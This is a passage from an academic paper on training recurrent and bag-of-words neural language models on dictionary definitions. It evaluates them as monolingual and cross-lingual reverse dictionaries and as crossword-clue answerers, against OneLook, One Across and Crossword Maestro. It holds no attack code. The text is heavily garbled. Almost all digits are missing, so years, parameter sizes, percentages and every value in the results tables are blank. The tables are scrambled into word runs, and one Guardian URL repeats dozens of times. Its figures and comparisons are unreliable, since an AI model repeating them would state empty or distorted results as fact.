fi- nally, the models will then map to and from the same space of embeddings (the embedding space will be closed under the operation of the model), so con- ceivably could be more easily applied as a general- purpose ‘composition engine’. . training objective we train all neural language models m to map the input definition phrase sc defining word c to a lo- cation close to the the pre-trained embedding vc of c. we experiment with two different cost functions for the word-phrase pair (c,sc) from the training data. the first is simply the cosine distance between m(sc) and vc. the second is the rank loss max( ,m− cos(m(sc),vc)−cos(m(sc),vr)) where vr is the embedding of a randomly-selected word from the vocabulary other than c. this loss function was used for language models, for example, in (huang et al., ). in all experiments we apply a margin m = . , which has been shown to work well on word-retrieval tasks (bordes et al., ). . implementation details since training on the dictionary data took - hours, we did not conduct a hyper-parameter search on any validation sets over the space of possible model configurations such as embedding dimension, or size of hidden layers. instead, we chose these parameters to be as standard as possible based on previous research. for fair comparison, any aspects of model design that are not specific to a particu- lar class of model were kept constant across experi- ments. the pre-trained word embeddings used in all of our models (either as input or target) were learned by a continuous bag-of-words (cbow) model using the word vec software on approximately billion words of running text. when training such models on massive corpora, a large embedding length of up to have been shown to yield best performance (see e.g. (faruqui et al., )). the pre-trained em- beddings used in our models were of length , as a compromise between quality and memory con- straints. in cases where the word embeddings are learned during training on the dictionary objective, we make these embeddings shorter ( ), since they must be learned from much less language data. in the rnn models, and at each time step each of the four lstm rnn internal layers (gating and activa- tion states) had length – another standard choice (see e.g. (cho et al., )). the final hidden state was mapped linearly to length , the dimension of the target embedding. in the bow models, the projection matrix projects input embeddings (either learned, of length , or pre-trained, of length ) to length for summing. all models were implemented with theano (bergstra et al., ) and trained with minibatch sgd on gpus. the batch size was fixed at and the learning rate was controlled by adadelta (zeiler, ). the word vec embedding models are well known; further details can be found at https://code.google.com/p/ word vec/ the training data for this pre-training was com- piled from various online text sources using the script demo- train-big-model-v .sh from the same page. reverse dictionaries the most immediate application of our trained mod- els is as a reverse dictionary or concept finder. it is simple to look up a definition in a dictionary given a word, but professional writers often also re- quire suitable words for a given idea, concept or definition. reverse dictionaries satisfy this need by returning candidate words given a phrase, de- scription or definition. for instance, when queried with the phrase an activity that requires strength and determination, the onelook.com reverse dictio- nary returns the concepts exercise and work. our trained rnn model can perform a similar func- tion, simply by mapping a phrase to a point in the target (word vec) embedding space, and returning the words corresponding to the embeddings that are closest to that point. several other academic studies have proposed reverse dictionary models. these generally rely on common techniques from information retrieval, comparing definitions in their internal database to the input query, and returning the word whose def- inition is ‘closest’ to that query (bilac et al., ; bilac et al., ; zock and bilac, ). proxim- ity is quantified differently in each case, but is gen- erally a function of hand-engineered features of the two sentences. for instance, shaw et al. ( ) pro- pose a method in which the candidates for a given input query are all words in the model’s database whose definitions contain one or more words from the query. this candidate list is then ranked accord- ing to a query-definition similarity metric based on the hypernym and hyponym relations in wordnet, features commonly used in ir such as tf-idf and a parser. there are, in addition, at least two commercial online reverse dictionary applications, whose ar- chitecture is proprietary knowledge. the first is the dictionary.com reverse dictionary , which re- trieves candidate words from the dictionary.com dictionary based on user definitions or descrip- tions. the second is onelook.com, whose algo- rithm searches indexed dictionaries, including see the testimony from professional writers at http:// www.onelook.com/?c=awards available at http://dictionary.reference. com/reverse/ https://code.google.com/p/word vec/ https://code.google.com/p/word vec/ http://www.onelook.com/?c=awards http://www.onelook.com/?c=awards http://dictionary.reference.com/reverse/ http://dictionary.reference.com/reverse/ all major freely-available online dictionaries and re- sources such as wikipedia and wordnet. . data collection and training to compile a bank of dictionary definitions for train- ing the model, we started with all words in the tar- get embedding space. for each of these words, we extracted dictionary-style definitions from five elec- tronic resources: wordnet, the american heritage dictionary, the collaborative international dictio- nary of english, wiktionary and webster’s. we chose these five dictionaries because they are freely- available via the wordnik api, but in theory any dictionary could be chosen. most words in our train- ing data had multiple definitions. for each word w with definitions {d . . .dn} we included all pairs (w,d ) . . .(w,dn) as training examples. to allow models access to more factual knowl- edge than might be present in a dictionary (for in- stance, information about specific entities, places or people, we supplemented this training data with in- formation extracted from simple wikipedia. for every word in the model’s target embedding space that is also the title of a wikipedia article, we treat the sentences in the first paragraph of the article as if they were (independent) definitions of that word. when a word in wikipedia also occurs in one (or more) of the five training dictionaries, we simply add these pseudo-definitions to the training set of definitions for the word. combining wikipedia and dictionaries in this way resulted in ≈ , word- ’definition’ pairs of ≈ , unique words. to explore the effect of the quantity of training data on the performance of the models, we also trained models on subsets of this data. the first sub- set comprised only definitions from wordnet (ap- proximately , definitions of , words). the second subset comprised only words in word- net and their first definitions (approximately , word, definition pairs). . for all variants of rnn and bow models, however, reducing the training data in this way resulted in a clear reduction in per- see http://developer.wordnik.com https://simple.wikipedia.org/wiki/main_ page as with other dictionaries, the first definition in wordnet generally corresponds to the most typical or common sense of a word. formance on all tasks. for brevity, we therefore do not present these results in what follows. . comparisons as a baseline, we also implemented two entirely unsupervised methods using the neural (word vec) word embeddings from the target word space. in the first (w v add), we compose the embeddings for each word in the input query by pointwise addition, and return as candidates the nearest word embed- dings to the resulting composed vector. the sec- ond baseline, (w v mult), is identical except that the embeddings are composed by elementwise mul- tiplication. both methods are established ways of building phrase representations from word embed- dings (mitchell and lapata, ). none of the models or evaluations from previous academic research on reverse dictionaries is pub- licly available, so direct comparison is not possi- ble. however, we do compare performance with the commercial systems. the dictionary.com sys- tem returned no candidates for over % of our in- put definitions. we therefore conduct detailed com- parison with onelook.com, which is the first re- verse dictionary tool returned by a google search and seems to be the most popular among writers. . reverse dictionary evaluation to our knowledge there are no established means of measuring reverse dictionary performance. in the only previous academic research on english reverse dictionaries that we are aware of, evaluation was conducted on word-definition pairs written by lexicographers (shaw et al., ). since these are not publicly available we developed new evaluation sets and make them freely available for future eval- uations. the evaluation items are of three types, designed to test different properties of the models. to cre- ate the seen evaluation, we randomly selected words from the wordnet training data (seen by all models), and then randomly selected a definition for each word. testing models on the resulting word-definition pairs assesses their ability to recall or decode previously encoded information. for the since we retrieve all answers from embedding spaces by cosine similarity, addition of word embeddings is equivalent to taking the mean. http://developer.wordnik.com https://simple.wikipedia.org/wiki/main_page https://simple.wikipedia.org/wiki/main_page dictionary definitions test set seen ( wn defs) unseen ( wn defs) concept descriptions ( ) unsup. w v add - - - . /. . /. models w v mult - - - . /. * . /. * onelook . /. - - - . . /. rnn cosine . /. . /. . /. rnn w v cosine . /. . /. . /. rnn ranking . /. . /. . /. nlms rnn w v ranking . /. . /. . /. bow cosine . /. . /. . /. bow w v cosine . /. . / . . /. bow ranking . /. . /. . /. bow w v rankng . /. . /. . /. median rank accuracy@ / rank variance table : performance of different reverse dictionary models in different evaluation settings. *low variance in mult models is due to consistently poor scores, so not highlighted. unseen evaluation, we randomly selected words from wordnet and excluded all definitions of these words from the training data of all models. finally, for a fair comparison with onelook, which has both the seen and unseen pairs in its in- ternal database, we built a new dataset of concept descriptions that do not appear in the training data for any model. to do so, we randomly selected adjectives, nouns or verbs from among the top most frequent tokens in the british national cor- pus (leech et al., ) (but outside the top ). we then asked ten native english speakers to write a single-sentence ‘description’ of these words. to ensure the resulting descriptions were good qual- ity, for each description we asked two participants who did not produce that description to list any words that fitted the description (up to a maximum of three). if the target word was not produced by one of the two checkers, the original participant was asked to re-write the description until the validation was passed. these concept descriptions, together with other evaluation sets, can be downloaded from our website for future comparisons. given a test description, definition, or question, all models produce a ranking of possible word an- swers based on the proximity of their representations of the input phrase and all possible output words. to quantify the quality of a given ranking, we re- port three statistics: the median rank of the correct re-writing was required in of the cases. test set word description dictionary valve ”control consisting of a mechanical definition device for controlling fluid flow” concept prefer ”when you like one thing description more than another thing” table : style difference between dictionary definitions and concept descriptions in the evaluation. answer (over the whole test set, lower better), the proportion of training cases in which the correct an- swer appears in the top / in this ranking (accu- racy@ / - higher better) and the variance of the rank of the correct answer across the test set (rank variance - lower better). . results table shows the performance of the different mod- els in the three evaluation settings. of the unsu- pervised composition models, elementwise addition is clearly more effective than multiplication, which almost never returns the correct word as the near- est neighbour of the composition. overall, however, the supervised models (rnn, bow and onelook) clearly outperform these baselines. the results indicate interesting differences be- tween the nlms and the onelook dictionary search engine. the seen (wn first) definitions in table occur in both the training data for the nlms and the lookup data for the onelook model. clearly the onelook algorithm is better than nlms at retriev- ing already available information (returning % of correct words among the top-ten candidates on this set). however, this is likely to come at the cost of a greater memory footprint, since the model requires access to its database of dictionaries at query time. the performance of the nlm embedding models on the (unseen) concept descriptions task shows that these models can generalise well to novel, unseen queries. while the median rank for onelook on this evaluation is lower, the nlms retrieve the cor- rect answer in the top ten candidates approximately as frequently, within the top candidates more frequently and with lower variance in ranking over the test set. thus, nlms seem to generalise more ‘consistenly’ than onelook on this dataset, in that they generally assign a reasonably high ranking to the correct word. in contrast, as can also be verified by querying our we demo, onelook tends to per- form either very well or poorly on a given query. when comparing between nlms, perhaps the most striking observation is that the rnn models do not significantly outperform the bow models, even though the bow model output is invariant to changes in the order of words in the definition. users of the online demo can verify that the bow models recover concepts from descriptions strikingly well, even when the words in the description are per- muted. this observation underlines the importance of lexical semantics in the interpretation of language by nlms, and is consistent with some other recent work on embedding sentences (iyyer et al., ). it is difficult to observe clear trends in the dif- ferences between nlms that learn input word em- beddings and those with pre-trained (word vec) in- put embeddings. both types of input yield good performance in some situations and weaker perfor- mance in others. in general, pre-training input em- beddings seems to help most on the concept de- scriptions, which are furthest from the training data in terms of linguistic style. this is perhaps unsur- prising, since models that learn input embeddings from the dictionary data acquire all of their concep- the trained neural language models are approximately half the size of the six training dictionaries stored as plain text, so would be hundreds of times smaller than the onelook database of dictionaries if stored this way. we also observed that the mean ranking for nlms was lower than for onelook on the concept descriptions task. tual knowledge from this data (and thus may over- fit to this setting), whereas models with pre-trained embeddings have some semantic memory acquired from general running-text language data and other knowledge acquired from the dictionaries. . qualitative analysis some example output from the various models is presented in table . the differences illustrated here are also evident from querying the web demo. the first example shows how the nlms (bow and rnn) generalise beyond their training data. four of the top five responses could be classed as ap- propriate in that they refer to inhabitants of cold countries. however, inspecting the wordnik train- ing data, there is no mention of cold or anything to do with climate in the definitions of eskimo, scandi- navian, scandinavia etc. therefore, the embedding models must have learned that coldness is a char- acteristic of scandinavia, siberia, russia, relates to eskimos etc. via connections with other concepts that are described or defined as cold. in contrast, the candidates produced by the onelook and (unsu- pervised) w v baseline models have nothing to do with coldness. the second example demonstrates how the nlms generally return candidates whose linguistic or con- ceptual function is appropriate to the query. for a query referring explicitly to a means, method or pro- cess, the rnn and bow models produce verbs in different forms or an appropriate deverbal noun. in contrast, onelook returns words of all types (aero- dynamics, draught) that are arbitrarily related to the words in the query. a similar effect is apparent in the third example. while the candidates produced by the onelook model are the correct part of speech (noun), and related to the query topic, they are not semantically appropriate. the dictionary embedding models are the only ones that return a list of plausi- ble habits, the class of noun requested by the input. . cross-lingual reverse dictionaries we now show how the rnn architecture can be eas- ily modified to create a bilingual reverse dictionary - a system that returns candidate words in one lan- guage given a description or definition in another. a bilingual reverse dictionary could have clear ap- plications for translators or transcribers. indeed, the input description onelook w v add rnn bow ”a native of :country :citizen :a .the :eskimo :scandinavian :frigid :cold a cold :foreign :naturalize :another :of :arctic :indian :icy :russian country” :cisco :whole :siberian :indian ”a way of :drag :whiz :the :through :glide :scooting :flying :gliding moving :aerodynamics :draught :a :moving :glides :gliding :glide :fly through :coefficient of drag :in :flight :scooting the air” ”a habit that :sisterinlaw :fatherinlaw :annoy :your :bossiness :jealousy :infidelity :bossiness might annoy :motherinlaw :stepson :might :that :annoyance :rudeness :foible :unfaithfulness your spouse” :stepchild :either :boorishness :adulterous table : the top-five candidates for example queries (invented by the authors) from different reverse dictionary mod- els. both the rnn and bow models are without word vec input and use the cosine loss. input description rnn en-fr w v add rnn + google ”an emotion that you might feel triste, pitoyable insister, effectivement sentiment, regretter after being rejected” répugnante, épouvantable pourquoi, nous peur, aversion ”a small black flying insect that mouche, canard attentivement, pouvions voler, faucon transmits disease and likes horses” hirondelle, pigeon pourrons, naturellement mouches, volant table : responses from cross-lingual reverse dictionary models to selected queries. underlined responses are ‘cor- rect’ or potentially useful for a native french speaker. problem of attaching appropriate words to concepts may be more common when searching for words in a second language than in a monolingual context. to create the bilingual variant, we simply replace the word vec target embeddings with those from a bilingual embedding space. bilingual embedding models use bilingual corpora to learn a space of rep- resentations of the words in two languages, such that words from either language that have similar meanings are close together (hermann and blun- som, ; chandar et al., ; gouws et al., ). for a test-of-concept experiment, we used english-french embeddings learned by the state-of- the-art bilbowa model (gouws et al., ) from the wikipedia (monolingual) and europarl (bilin- gual) corpora. we trained the rnn model to map from english definitions to english words in the bilingual space. at test time, after reading an en- glish definition, we then simply return the nearest french word neighbours to that definition. because no benchmarks exist for quantitative the approach should work with any bilingual embeddings. we thank stephan gouws for doing the training. evaluation of bilingual reverse dictionaries, we com- pare this approach qualitatively with two alternative methods for mapping definitions to words across languages. the first is analogous to the w v add model of the previous section: in the bilingual em- bedding space, we first compose the embeddings of the english words in the query definition with ele- mentwise addition, and then return the french word whose embedding is nearest to this vector sum. the second uses the rnn monolingual reverse dictio- nary model to identify an english word from an en- glish definition, and then translates that word using google translate. table shows that the rnn model can be ef- fectively modified to create a cross-lingual reverse dictionary. it is perhaps unsurprising that the w v add model candidates are generally the lowest in quality given the performance of the method in the monolingual setting. in comparing the two rnn- based methods, the rnn (embedding space) model appears to have two advantages over the rnn + google approach. first, it does not require on- line access to a bilingual word-word mapping as defined e.g. by google translate. second, it less prone to errors caused by word sense ambiguity. for example, in response to the query an emotion you feel after being rejected, the bilingual embed- ding rnn returns emotions or adjectives describing mental states. in contrast, the monolingual+google model incorrectly maps the plausible english re- sponse regret to the verbal infinitive regretter. the model makes the same error when responding to a description of a fly, returning the verb voler (to fly). . discussion we have shown that simply training rnn or bow nlms on six dictionaries yields a reverse dictionary that performs comparably to the leading commer- cial system, even with access to much less dictio- nary data. indeed, the embedding models consis- tently return syntactically and semantically plausi- ble responses, which are generally part of a more coherent and homogeneous set of candidates than those produced by the commercial systems. we also showed how the architecture can be easily extended to produce bilingual versions of the same model. in the analyses performed thus far, we only test the dictionary embedding approach on tasks that it was trained to accomplish (mapping definitions or descriptions to words). in the next section, we ex- plore whether the knowledge learned by dictionary embedding models can be effectively transferred to a novel task. general knowledge (crossword) question answering the automatic answering of questions posed in nat- ural language is a central problem of artificial in- telligence. although web search and ir techniques provide a means to find sites or documents related to language queries, at present, internet users requiring a specific fact must still sift through pages to locate the desired information. systems that attempt to overcome this, via fully open-domain or general knowledge question- answering (open qa), generally require large teams of researchers, modular design and powerful infras- tructure, exemplified by ibm’s watson (ferrucci et al., ). for this reason, much academic re- search focuses on settings in which the scope of the task is reduced. this has been achieved by restrict- ing questions to a specific topic or domain (mollá and vicedo, ), allowing systems access to pre- specified passages of text from which the answer can be inferred (iyyer et al., ; weston et al., ), or centering both questions and answers on a partic- ular knowledge base (berant and liang, ; bor- des et al., ). in what follows, we show that the dictionary em- bedding models introduced in the previous sections may form a useful component of an open qa sys- tem. given the absence of a knowledge base or web-scale information in our architecture, we nar- row the scope of the task by focusing on general knowledge crossword questions. general knowl- edge (non-cryptic, or quick) crosswords appear in national newspapers in many countries. crossword question answering is more tractable than general open qa for two reasons. first, models know the length of the correct answer (in letters), reducing the search space. second, some crossword questions mirror definitions, in that they refer to fundamental properties of concepts (a twelve-sided shape) or re- quest a category member (a city in egypt). . evaluation general knowledge crossword questions come in different styles and forms. we used the eddie james crossword website to compile a bank of sentence- like general-knowledge questions. eddie james is one of the uk’s leading crossword compilers, work- ing for several national newspapers. our long ques- tion set consists of the first questions (starting from puzzle # ) from his general-knowledge cross- words, excluding clues of fewer than four words and those whose answer was not a single word (e.g. kingjames). to evaluate models on a different type of clue, we also compiled a set of shorter questions based on the guardian quick crossword. guardian questions still require general factual or linguistic knowledge, but are generally shorter and somewhat more cryptic than the longer eddie james clues. we again formed as our interest is in the language understanding, we do not address the question of fitting answers into a grid, which is the main concern of end-to-end automated crossword solvers (littman et al., ). http://www.eddiejames.co.uk/ http://www.eddiejames.co.uk/ a list of questions, beginning on january and excluding any questions with multiple-word an- swers. for clear contrast, we excluded those few questions of length greater than four words. of these clues, a subset of were single-word clues. all evaluation datasets are available online with the paper. as with the reverse dictionary experiments, can- didates are extracted from models by inputting def- initions and returning words corresponding to the closest embeddings in the target space. in this case, however, we only consider candidate words whose length matches the length specified in the clue. test set word description long baudelaire ”french poet ( ) and key figure in the development of symbolism.” short ( ) satanist ”devil devotee” single-word ( ) guilt ”culpability” table : examples of the different question types in the crossword question evaluation dataset. . benchmarks and comparisons as with the reverse dictionary experiments, we com- pare rnn and bow nlms with a simple unsuper- vised baseline of elementwise addition of word vec vectors in the embedding space (we discard the in- effective w v mult baseline), again restricting can- didates to words of the pre-specified length. we also compare to two bespoke online crossword- solving engines. the first, one across (http: //www.oneacross.com/) is the candidate gen- eration module of the award-winning proverb cross- word system (littman et al., ). proverb, which was produced by academic researchers, has featured in national media such as new scientist, and beaten expert humans in crossword solving tournaments. the second comparison is with crossword maestro (http://www.crosswordmaestro.com/), a commercial crossword solving system that handles both cryptic and non-cryptic crossword clues (we focus only on the non-cryptic setting), and has also been featured in national media. we are unable see e.g. http://www.theguardian.com/ crosswords/crossword-blog/ /mar/ / to compare against a third well-known automatic crossword solver, dr fill (ginsberg, ), because code for dr fill’s candidate-generation module is not readily available. as with the rnn and base- line models, when evaluating existing systems we discard candidates whose length does not match the length specified in the clue. certain principles connect the design of the ex- isting commercial systems and differentiate them from our approach. unlike the nlms, they each re- quire query-time access to large databases contain- ing common crossword clues, dictionary definitions, the frequency with which words typically appear as crossword solutions and other hand-engineered and task-specific components (littman et al., ; ginsberg, ). . results the performance of models on the various question types is presented in table . when evaluating the two commercial systems, one across and cross- word maestro, we have access to web interfaces that return up to approximately candidates for each query, so can only reliably record membership of the top ten (accuracy@ ). on the long questions, we observe a clear advan- tage for all dictionary embedding models over the commercial systems and the simple unsupervised baseline. here, the best performing nlm (rnn with word vec input embeddings and ranking loss) ranks the correct answer third on average, and in the top-ten candidates over % of the time. as the questions get shorter, the advantage of the embedding models diminishes. both the unsu- pervised baseline and one across answer the short questions with comparable accuracy to the rnn and bow models. one reason for this may be the differ- ence in form and style between the shorter clues and the full definitions or encyclopedia sentences in the dictionary training data. as the length of the clue de- creases, finding the answer often reduces to generat- ing synonyms (culpability - guilt), or category mem- bers (tall animal - giraffe). the commercial systems can retrieve good candidates for such clues among their databases of entities, relationships and com- mon crossword answers. unsupervised word vec crossword-blog-computers-crack-cryptic- clues http://www.oneacross.com/ http://www.oneacross.com/ http://www.crosswordmaestro.com/ http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues question type avg rank -accuracy@ / - rank variance long ( ) short ( ) single-word ( ) one across . / . / . / crossword maestro . / . / . / w v add . /. . /. . /. rnn cosine . /. . /. . /. rnn w v cosine . /. . /. . /. rnn ranking . /. . /. . /. rnn w v ranking . /. . /. . /. bow cosine . /. . /. . /. bow w v cosine . /. . /. . /. bow ranking . /. . /. . /. bow w v ranking . /. . /. . /. table : performance of different models on crossword questions of different length. the two commercial systems are evaluated via their web interface so only accuracy@ can be reported in those cases. representations are also known to encode these sorts of relationships (even after elementwise addition for short sequences of words) (mikolov et al., ). this would also explain why the dictionary embed- ding models with pre-trained (word vec) input em- beddings outperfom those with learned embeddings, particularly for the shortest questions. . qualitative analysis a better understanding of how the different models arrive at their answers can be gained from consider- ing specific examples, as presented in table . the first three examples show that, despite the apparently superficial nature of its training data (definitions and introductory sentences) embedding models can an- swer questions that require factual knowledge about people and places. another notable characteristic of these model is the consistent semantic appropriate- ness of the candidate set. in the first case, the top five candidates are all mountains, valleys or places in the alps; in the second, they are all biblical names. in the third, the rnn model retrieves currencies, in this case performing better than the bow model, which retrieves entities of various type associated with the netherlands. generally speaking (as can be observed by the web demo), the ‘smoothness’ or consistency in candidate generation of the dictionary embedding models is greater than that of the com- mercial systems. despite its simplicity, the unsuper- vised w v addition method is at times also surpris- ingly effective, as shown by the fact that it returns joshua in its top candidates for the third query. the final example in table illustrates the sur- prising power of the bow model. in the training data there is a single definition for the correct an- swer schoenberg: united states composer and musi- cal theorist (born in austria) who developed atonal composition. the only word common to both the query and the definition is ’composer’ (there is no tokenization that allows the bow model to directly connect atonal and atonality). nevertheless, the model is able to infer the necessary connections be- tween the concepts in the query and the definition to return schoenberg as the top candidate. despite such cases, it remains an open question whether, with more diverse training data, the world knowledge required for full open qa (e.g. sec- ondary facts about schoenberg, such as his fam- ily) could be encoded and retained as weights in a (larger) dynamic network, or whether it will be nec- essary to combine the rnn with an external mem- ory that is less frequently (or never) updated. this latter approach has begun to achieve impressive re- sults on certain qa and entailment tasks (bordes et al., ; graves et al., ; weston et al., ). conclusion dictionaries exist in many of the world’s languages. we have shown how these lexical resources can con- stitute valuable data for training the latest neural lan- guage models to interpret and represent the mean- ing of phrases and sentences. while humans use input description one across crossword maestro bow rnn ”swiss mountain :noted :front :after :favor :eiger .crags :eiger :aosta peak famed for its :eiger :crown :ahead :along :teton :cerro :cuneo :lecco north face ( )” :fount :being :jebel :tyrol ”old testament :joshua :exodus :devise :daniel :isaiah :elijah :joshua :isaiah successor to :hebrew :person :haggai : isaiah :joshua :elisha :gideon :elijah moses ( )” :across :joseph :yahweh :yahweh ”the former :holland :general :holland :ancient :guilder :holland :guilder :escudos currency of the :lesotho :earlier :onetime :drenthe :utrecht :pesetas :someren netherlands :qondam :naarden :florins ( )” ”arnold, th :surrealism :disharmony :schoenberg :mendelsohn century composer :laborparty :dissonance :christleib :williamson pioneer of :tonemusics :bringabout :stravinsky :huddleston atonality :introduced :constitute :elderfield :mandelbaum ( )” :schoenberg :triggeroff :mendelsohn :zimmerman table : responses from different models to example crossword clues. in each case the model output is filtered to exclude any candidates that are not of the same length as the correct answer. bow and rnn models are trained without word vec input embeddings and cosine loss. the phrasal definitions in dictionaries to better un- derstand the meaning of words, machines can use the words to better understand the phrases. we used two dictionary embedding architectures - a recurrent neural network architecture with a long-short-term memory, and a simpler linear bag-of-words model - to explicitly exploit this idea. on the reverse dictionary task that mirrors its training setting, nlms that embed all known con- cepts in a continuous-valued vector space perform comparably to the best known commercial applica- tions despite having access to many fewer defini- tions. moreover, they generate smoother sets of can- didates and require no linguistic pre-processing or task-specific engineering. we also showed how the description-to-word objective can be used to train models useful for other tasks. nlms trained on the same data can answer general-knowledge crossword questions, and indeed outperform commercial sys- tems on questions containing more than four words. while our qa experiments focused on crosswords, the results suggest that a similar embedding-based approach may ultimately lead to improved output from more general qa and dialog systems and in- formation retrieval engines in general. we make all code, training data, evaluation sets and both of our linguistic tools publicly available on- line for future research. in particular, we propose the reverse dictionary task as a comparatively general- purpose and objective way of evaluating how well models compose lexical meaning into phrase or sen- tence representations (whether or not they involve training on definitions directly). in the next stage of this research, we will ex- plore ways to enhance the nlms described here, especially in the question-answering context. the models are currently not trained on any question- like language, and would conceivably improve on exposure to such linguistic forms. we would also like to understand better how bow models can per- form so well with no ‘awareness’ of word order, and whether there are specific linguistic contexts in which models like rnns or others with the power to encode word order are indeed necessary. finally, we intend to explore ways to endow the model with richer world knowledge. this may require the in- tegration of an external memory module, similar to the promising approaches proposed in several recent papers (graves et al., ; weston et al., ). acknowledgments kc and yb acknowledge the support of the follow- ing organizations: nserc, calcul québec, com- pute canada, the canada research chairs and ci- far. fh and ak were supported by google faculty research award, and ak further by google euro- pean fellowship. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceeding of iclr. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradient descent is difficult. neural networks, ieee transac- tions on, ( ): – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the associa- tion for computational linguistics. james bergstra, olivier breuleux, frédéric bastien, pas- cal lamblin, razvan pascanu, guillaume desjardins, joseph turian, david warde-farley, and yoshua ben- gio. . theano: a cpu and gpu math expression compiler. in proceedings of the python for scientific computing conference (scipy). slaven bilac, timothy baldwin, and hozumi tanaka. . improving dictionary accessibility by maximiz- ing use of available knowledge. traitement automa- tique des langues, ( ): – . slaven bilac, wataru watanabe, taiichi hashimoto, takenobu tokunaga, and hozumi tanaka. . dic- tionary search based on the target word description. in proceedings of nlp . antoine bordes, sumit chopra, and jason weston. . question answering with subgraph embeddings. pro- ceedings of emnlp. antoine bordes, nicolas usunier, sumit chopra, and jason weston. . large-scale simple question answering with memory networks. arxiv preprint arxiv: . . sarath chandar, stanislas lauly, hugo larochelle, mitesh khapra, balaraman ravindran, vikas c. raykar, and amrita saha. . an autoencoder ap- proach to learning bilingual word representations. in advances in neural information processing systems, pages – . kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder-decoder for statis- tical machine translation. in proceedings of emnlp. manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. pro- ceedings of the north american chapter of the asso- ciation for computational linguistics. david ferrucci, eric brown, jennifer chu-carroll, james fan, david gondek, 